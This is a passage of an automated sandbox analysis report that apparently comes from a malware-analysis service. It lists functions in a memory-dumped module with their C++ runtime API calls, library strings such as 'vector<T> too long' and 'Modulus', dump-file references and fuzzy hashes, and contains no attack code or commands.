Instruction Fuzzy Hash: D54134B1508780AFC320CF29C490A5BFBE4BB99714F504E6EF5A98B391DB719908CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6F871EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

__CxxThrowException@8.LIBCMT ref: 6F871F36

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

std::exception::exception.LIBCMT ref: 6F871F6E

Part of subcall function 6F8D95C1: std::exception::operator=.LIBCMT ref: 6F8D95DA

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F874067
Part of subcall function 6F874010: _memmove.LIBCMT ref: 6F8740C8

Strings

CryptoMaterial: this object does not support precomputation, xrefs: 6F871ED4

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
String ID: CryptoMaterial: this object does not support precomputation
API String ID: 2192554526-3625584042
Opcode ID: 9a435c4a867f08a0d7eee1323b528aa7c124ed58657d0a6932e31d7e0471698a
Instruction ID: 667b12188b3c2d4b5dda55911610e86c1eb7a72e30f5c0acf1103de1a1497bd8
Opcode Fuzzy Hash: 9a435c4a867f08a0d7eee1323b528aa7c124ed58657d0a6932e31d7e0471698a
Instruction Fuzzy Hash: 37316171805248FFDB14DF98D840BAEFBB8FB45764F104A6EE421AB780D7755505CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6F883317 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6F883327

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

std::_Xinvalid_argument.LIBCPMT ref: 6F88336B

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

Strings

vector<T> too long, xrefs: 6F883366

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 1735018483-3788999226
Opcode ID: dc046d66d550b7f95eec1f3dd2c95398eff870e4c844ab93d4578988ede0c572
Instruction ID: 21802160557d46aa8f70808c8f817691d49bb8009729ccbf799255d08ef59c2a
Opcode Fuzzy Hash: dc046d66d550b7f95eec1f3dd2c95398eff870e4c844ab93d4578988ede0c572
Instruction Fuzzy Hash: 9F31C475A04609AFDB14CF98D891A9AB7B0FB45364F104A79E9299F384D731BD00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F895810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F89584D

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

VariantClear.OLEAUT32(00000000), ref: 6F895899

Strings

vector<T> too long, xrefs: 6F895848

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 2677079660-3788999226
Opcode ID: f7dfaa31a75273e13b783fbe72aef2e9762bcbec5158edf6f401d50c2e0d840d
Instruction ID: c097ad8f92367cbc6e868b61b7fbf3c332f28e1a5d3c3046f9c7edf8a2a25f45
Opcode Fuzzy Hash: f7dfaa31a75273e13b783fbe72aef2e9762bcbec5158edf6f401d50c2e0d840d
Instruction Fuzzy Hash: 7B216072A00709AFD714CF6CD880A6FB7F9EF84364F244A6EE455AB780D730A9408B90

Uniqueness

Uniqueness Score: -1.00%

Function 6F885750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F88576B

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

std::_Xinvalid_argument.LIBCPMT ref: 6F885782

Strings

string too long, xrefs: 6F885766, 6F88577D

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 4537731dc73d64dd0bba635803068b3ecc90b74790d2d83761d0c32b3d78d010
Instruction ID: 2a0eac183e2cb2a2f7d2a3c7644aa3a5a93d352dbbdc651f5bc2ce62187446a2
Opcode Fuzzy Hash: 4537731dc73d64dd0bba635803068b3ecc90b74790d2d83761d0c32b3d78d010
Instruction Fuzzy Hash: D711B7333047149FD325A95CA890A6AF3E9EF95670F204A9FE563CF680C771A80483A1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8746B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F8746C4

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

_memmove.LIBCMT ref: 6F87470B

Strings

string too long, xrefs: 6F8746BF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 1785806476-2556327735
Opcode ID: ac9c4488d2789906a14a4042fd1ed9c4fc2fe9670fb43e3c6d40ac914583caf0
Instruction ID: ee93ec3a4cc04362d8136ac46654ab3631baf09e40b46ccb8db36903ffa830cf
Opcode Fuzzy Hash: ac9c4488d2789906a14a4042fd1ed9c4fc2fe9670fb43e3c6d40ac914583caf0
Instruction Fuzzy Hash: 7E119672104314DFE7349D7CA8D0B6EB7A8BF92614F204E6FE4978B582DB61B4488351

Uniqueness

Uniqueness Score: -1.00%

Function 6F8A4D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

__CxxThrowException@8.LIBCMT ref: 6F8A4E00

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Strings

ArraySink: missing OutputBuffer argument, xrefs: 6F8A4D91
OutputBuffer, xrefs: 6F8A4D77

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
API String ID: 3718517217-3781944848
Opcode ID: 5bd1b26d89d62cd5dacc273a1673680a2820a02ea2ab922611000566eeba5700
Instruction ID: edfd3abf859a052151148c1fd17fb66c34332c569a2b34682d606b00c5b1791f
Opcode Fuzzy Hash: 5bd1b26d89d62cd5dacc273a1673680a2820a02ea2ab922611000566eeba5700
Instruction Fuzzy Hash: 773116B1508780AFC314CF68C480A5AFBE4BBDA754F404E6EF5A587391DB75D908CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F880150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

__CxxThrowException@8.LIBCMT ref: 6F880201

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Strings

StringSink: OutputStringPointer not specified, xrefs: 6F88019B
OutputStringPointer, xrefs: 6F88018C

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
API String ID: 3718517217-1331214609
Opcode ID: 90588b3b7de1687c224827b7724ad037b8d90a9e7aa0f7c5a70f5395985b3433
Instruction ID: e8ca589a1f0a8df7e94d5c75acba7db6110322d6b3e93680348fbbd905724d8f
Opcode Fuzzy Hash: 90588b3b7de1687c224827b7724ad037b8d90a9e7aa0f7c5a70f5395985b3433
Instruction Fuzzy Hash: 9A213D71D05248EFCB04DF98D890B9DFBB4BF59254F1086AAE425AB391DB356504CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6F874620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F874636

Part of subcall function 6F8D9125: std::exception::exception.LIBCMT ref: 6F8D913A
Part of subcall function 6F8D9125: __CxxThrowException@8.LIBCMT ref: 6F8D914F
Part of subcall function 6F8D9125: std::exception::exception.LIBCMT ref: 6F8D9160

_memmove.LIBCMT ref: 6F87466F

Strings

invalid string position, xrefs: 6F874631

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: cd572ccdf05e91cb807f08ffca15d7b5b9f0cfce2125eadf0f6d56273b7f67f3
Instruction ID: 1a9d7bf9828eff39826ed37d24ab4ae44af50e04fc4d2b1bdc56dd168c8afba6
Opcode Fuzzy Hash: cd572ccdf05e91cb807f08ffca15d7b5b9f0cfce2125eadf0f6d56273b7f67f3
Instruction Fuzzy Hash: 4201A531340240DBE3308D6CE890A5FB7AAABD1754B244D6ED195CF745DAB1E84183A1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8AACA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6F8AACF8

Strings

Modulus, xrefs: 6F8AAD30
PublicExponent, xrefs: 6F8AAD1F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: type_info::operator!=
String ID: Modulus$PublicExponent
API String ID: 2241493438-3324115277
Opcode ID: aa7ab7e213aa9b521053b396f6750f79e767671de7cab529fc4f8fc787b2c229
Instruction ID: 1f2777bbd12f51f64331fb6699660f425068a9966001f8e456b2c068a1dfa0de
Opcode Fuzzy Hash: aa7ab7e213aa9b521053b396f6750f79e767671de7cab529fc4f8fc787b2c229
Instruction Fuzzy Hash: C111E030908304AFC244DF6CC94494BFBE4EFD6248F404A9EF8815F290DB32D848CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F8CB7F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6F8CB848

Strings

Modulus, xrefs: 6F8CB880
PublicExponent, xrefs: 6F8CB86F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: type_info::operator!=
String ID: Modulus$PublicExponent
API String ID: 2241493438-3324115277
Opcode ID: f6ea5a8ea677ce39853434ed3ad2938111d839172b0f7bdb4a319851ddc7041f
Instruction ID: 12f2c0f2f721f62125d0a10f07b1ead830bb3f82c68a6fd377ce81421f949d6e
Opcode Fuzzy Hash: f6ea5a8ea677ce39853434ed3ad2938111d839172b0f7bdb4a319851ddc7041f
Instruction Fuzzy Hash: 5E11CE30A09344AEC600DF6D894058ABBE4EFD6288F400AAEF9815F291DB35D949CBD7

Uniqueness

Uniqueness Score: -1.00%

Function 6F8AB5F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F8AB605

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

_memmove.LIBCMT ref: 6F8AB634

Strings

vector<T> too long, xrefs: 6F8AB600

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 160569c1728fe0e97d6fa25b4a96c19470a2da49e0068d65a4c156678314a27a
Instruction ID: 56a589c733c74cfb48f20576d431b69bce2e02f89f21f13f84439b507d0c46ab
Opcode Fuzzy Hash: 160569c1728fe0e97d6fa25b4a96c19470a2da49e0068d65a4c156678314a27a
Instruction Fuzzy Hash: C50184B26003099FD724DEADDC91C6BB3E8EF542147144E6EE99BC7694E671F804CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D4230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F8D4241

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

_memmove.LIBCMT ref: 6F8D4277

Strings

vector<bool> too long, xrefs: 6F8D423C

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<bool> too long
API String ID: 1785806476-842332957
Opcode ID: b58b3f99f9f79a57c23c15161a5b02c810b95b9bbab467e0280c8d3322fc9924
Instruction ID: e599c357650d6874c6a94688f80df8c8689b385bd13db85cb489f106c9ade7a5
Opcode Fuzzy Hash: b58b3f99f9f79a57c23c15161a5b02c810b95b9bbab467e0280c8d3322fc9924
Instruction Fuzzy Hash: 7101D472A001055BC708CF69DC918AEB3A9FFC4354F514A6AF5168B644E735B905C790

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D3840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F8D3855

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

_memmove.LIBCMT ref: 6F8D3880

Strings

vector<T> too long, xrefs: 6F8D3850

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: f2dddf6769c876f8795b460f703ec52c545cb87a2645d016a71ba285c6e89a5b
Instruction ID: e5e6a606b2d823004c9d39b99fc4ff2602bb6ee3d7d06c41156b40019cd7689f
Opcode Fuzzy Hash: f2dddf6769c876f8795b460f703ec52c545cb87a2645d016a71ba285c6e89a5b
